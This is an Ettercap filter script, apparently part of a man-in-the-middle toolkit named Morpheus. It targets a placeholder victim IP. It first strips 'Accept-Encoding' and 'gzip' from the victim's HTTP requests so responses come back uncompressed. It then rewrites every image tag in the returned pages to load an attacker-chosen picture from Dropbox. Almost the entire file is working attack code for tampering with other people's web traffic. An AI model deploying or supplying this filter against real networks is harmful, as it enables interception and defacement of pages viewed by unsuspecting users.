############################################################################
#                                                                          #
#  HTTPS Request/Response Filter                                           #
#  based on code from ALoR & NaGA                                          #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

##
#  This filter will substitute the html tag '<title>'
#  and injects your image in any webpage requested.
##




##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {  
   if (search(DATA.data, "Accept-Encoding")) {  
    replace("Accept-Encoding", "Accept-Rubbish!");   
      # note: replacement string is same length as original string  
      msg("[Morpheus] Status: Encoding zapped.");  
   }  
   if (search(DATA.data, "gzip")) {  
    replace("gzip", "  ");  
    msg("[Morpheus] |  info : whited out gzip!");
    msg("[Morpheus] |_ info : Image injected and forward to target ✔\n"); 
   }  
}


#####################
## Replace Content ##
#####################
# http://3.bp.blogspot.com/-LYY46BB5FAE/UXhWPEJcokI/AAAAAAAAAKQ/uVGpXjOZusM/s400/pwned+DH.jpg
# https://dl.dropboxusercontent.com/u/21426454/DLL%20Injection-Functions.png
# https://dl.dropboxusercontent.com/u/21426454/pwned_DH.jpg

 if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"https://dl.dropboxusercontent.com/u/21426454/DLL%20Injection-Functions.png\" ");  
   replace("IMG SRC=", "img src=\"https://dl.dropboxusercontent.com/u/21426454/DLL%20Injection-Functions.png\" ");   
 } 

